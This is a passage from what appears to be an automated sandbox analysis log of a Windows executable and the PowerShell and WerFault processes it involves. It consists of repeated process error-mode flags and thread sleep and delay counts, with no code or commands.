Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeWindow / User API: threadDelayed 517Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6552Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2189Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeWindow / User API: threadDelayed 437Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4696
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1917
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeWindow / User API: threadDelayed 404
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5787
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 933
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 520Thread sleep count: 252 > 30Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 520Thread sleep count: 517 > 30Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5476Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5476Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep count: 6552 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep count: 2189 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7612Thread sleep count: 437 > 30Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7648Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7648Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 4696 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 1917 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8024Thread sleep count: 404 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8096Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 5787 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 933 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
